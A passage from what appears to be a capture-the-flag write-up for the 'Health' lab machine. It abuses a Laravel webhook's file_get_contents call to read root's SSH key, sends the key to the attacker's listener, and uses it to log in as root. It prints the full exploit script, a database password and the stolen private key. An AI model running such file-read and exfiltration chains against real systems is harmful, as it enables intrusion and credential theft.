| id           | char(36)     | NO   | PRI | NULL    |       |
| webhookUrl   | varchar(255) | NO   |     | NULL    |       |
| onlyError    | tinyint(1)   | NO   |     | NULL    |       |
| monitoredUrl | varchar(255) | NO   |     | NULL    |       |
| frequency    | varchar(255) | NO   |     | NULL    |       |
| created_at   | timestamp    | YES  |     | NULL    |       |
| updated_at   | timestamp    | YES  |     | NULL    |       |
+--------------+--------------+------+-----+---------+-------+
```

I ran my `test_webhook.py` script but saw no changes.  
My script was not creating a webhook but was merely testing one. So it makes sense.  
I modified it to create another script, `create_webhook.py`  
(I only replaced `'action': 'Test'` with `'action': 'Create'`)

```console
opcode@parrot$ python3 create_webhook.py
Webhook created!
```

And immediately, the `tasks` table was populated.

## Arbitrary file read with `file_get_contents`

Nothing so far was interesting. After taking another hint, I dived into the code responsible for health checks:

```console
susanne@health:/var/www/html$ cat app/Http/Controllers/HealthChecker.php
```

I got:

```php
<?php

namespace App\Http\Controllers;

class HealthChecker
{
    public static function check($webhookUrl, $monitoredUrl, $onlyError = false)
    {

        $json = [];
        $json['webhookUrl'] = $webhookUrl;
        $json['monitoredUrl'] = $monitoredUrl;

        $res = @file_get_contents($monitoredUrl, false);
        if ($res) {

            if ($onlyError) {
                return $json;
            }

            $json['health'] = "up";
      $json['body'] = $res;
      if (isset($http_response_header)) {
            $headers = [];
            $json['message'] = $http_response_header[0];

            for ($i = 0; $i <= count($http_response_header) - 1; $i++) {

                $split = explode(':', $http_response_header[$i], 2);

                if (count($split) == 2) {
                    $headers[trim($split[0])] = trim($split[1]);
                } else {
                    error_log("invalid header pair: $http_response_header[$i]\n");
                }

            }

      $json['headers'] = $headers;
      }

        } else {
            $json['health'] = "down";
        }

        $content = json_encode($json);

        // send
        $curl = curl_init($webhookUrl);
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_HTTPHEADER,
            array("Content-type: application/json"));
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $content);
        curl_exec($curl);
        curl_close($curl);

        return $json;

    }
}
```

This line is suspiciously weird:

```php
$res = @file_get_contents($monitoredUrl, false);
```

`file_get_contents` can be used with URLs, but as the name suggests, it can also be used to read regular files.  
It can be used to read arbitrary files with root privileges, as the cron job ran the scheduler with root privileges.

To test that, I decided to try and read `/root/.ssh/id_rsa`

First, I ran `create_webhook.py` to populate the `tasks` table:

```console
opcode@parrot$ python3 create_webhook.py
Webhook created!
```

Then, I grabbed the `task id` with this query:

```console
susanne@health:~$ mysql --user=laravel --password=MYsql_strongestpass@2014+ --database=laravel -e 'select id from tasks;' -sN 2>/dev/null
9255bd9a-55a2-4c59-bf5b-6a76f9a26506
```

Then, I replaced the `monitoredUrl` via another query:

```console
susanne@health:~$ mysql --user=laravel --password=MYsql_strongestpass@2014+ --database=laravel -e "UPDATE tasks SET monitoredUrl = '/root/.ssh/id_rsa' WHERE id = '11469aa0-e1ef-422e-854b-ddf8b7d5a466';"
```

I tried to get it to work, but the timing was very tight.  
By the time I updated and pasted the second query, the data in `tasks` table was already truncated.

To get around that, I modified [create_webhook.py](create_webhook.py) to grab the `task id` and then used `pyperclip` to add the query to my clipboard.

```py
import requests
import re
import pyperclip

from socket import socket, AF_INET, SOCK_DGRAM, inet_ntoa
from struct import pack
from fcntl import ioctl

url = 'http://health.htb'

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'


def grab_cookies_and_token():
    r = requests.get(url, proxies=proxy)
    token_pattern = re.compile(r'name="_token" value="(.+?)">', re.DOTALL)
    matches = token_pattern.search(r.text)
    token = matches.group(1)
    return r.cookies, token


def grab_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack('256s', b'tun0'))[20:24]
    return inet_ntoa(packed_addr)


def health_check_webhook(tun_ip, token, cookie_jar):
    payload = {'_token': token, 'webhookUrl': f'http://{tun_ip}:8000', 'monitoredUrl': f'http://{tun_ip}',
               'frequency': '*/1 * * * *', 'onlyError': '0', 'action': 'Create'}
    r = requests.post(url + '/webhook', data=payload, cookies=cookie_jar, allow_redirects=False, proxies=proxy)
    return r.headers['Location']


if __name__ == "__main__":
    tun_ip = grab_tun_ip()
    cookie_jar, token = grab_cookies_and_token()
    resp = health_check_webhook(tun_ip, token, cookie_jar)

    task_id = resp.split('/')[-1]
    query = f'mysql --user=laravel --password=MYsql_strongestpass@2014+ --database=laravel -e "UPDATE tasks SET monitoredUrl = \'/root/.ssh/id_rsa\' WHERE id = \'{task_id}\';"'
    pyperclip.copy(query)
    print('Success!')
```

For the moment of truth, I ran `webhook_handler.py`:

```console
opcode@parrot$ python3 webhook_handler.py
```

Then, I ran `create_webhook.py`

```console
opcode@parrot$ python3 create_webhook.py
Success!
```

As soon as I saw "Success!", I pasted my clipboard into the terminal:

```console
susanne@health:~$ mysql --user=laravel --password=MYsql_strongestpass@2014+ --database=laravel -e "UPDATE tasks SET monitoredUrl = '/root/.ssh/id_rsa' WHERE id = '1c61ba73-e1ee-4af9-b189-effbab52f849';"
```

After a while, I got root's private key in my `webhook_handler.py` listener:

```text
Request body:

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9/jG5NPqc2TfW4Nlj9gE
KScDJTrF0vXYnIy4yUwM4/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq
IMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH/
KuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL/XP1hN4B7egzjcV8Rphj6XRE3bhgH
7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8
W6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae
NPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9
t3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8/v/3Jeesznu+RJ+G0ezyUGfi0wpQRoD
C2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl
hnqFXpOWB771WnW9yH7/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x/LUyan++D+8
efiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2
1bLlZQECgYEA9iT13rdKQ/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj
nVhtw6NRFZ1Gfu21kPTCUTK34iX/p/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3
sqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou
fEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q
0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ
zkbVWX3JRDh4vdFOBGB/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT
rti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB
N1ZI4E59+O3Z15VgZ/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD
SsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o
++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp
UnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR/xkIP/Mog1a
vmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU
6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC/cQbPm
QeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G
-----END RSA PRIVATE KEY-----
```

Saving it to `id_rsa.root`, I was able to get shell as root:

```console
opcode@parrot$ chmod 600 id_rsa.root
opcode@parrot$ ssh -i id_rsa.root root@health.htb
```

```console
root@health:~# id
uid=0(root) gid=0(root) groups=0(root)
```
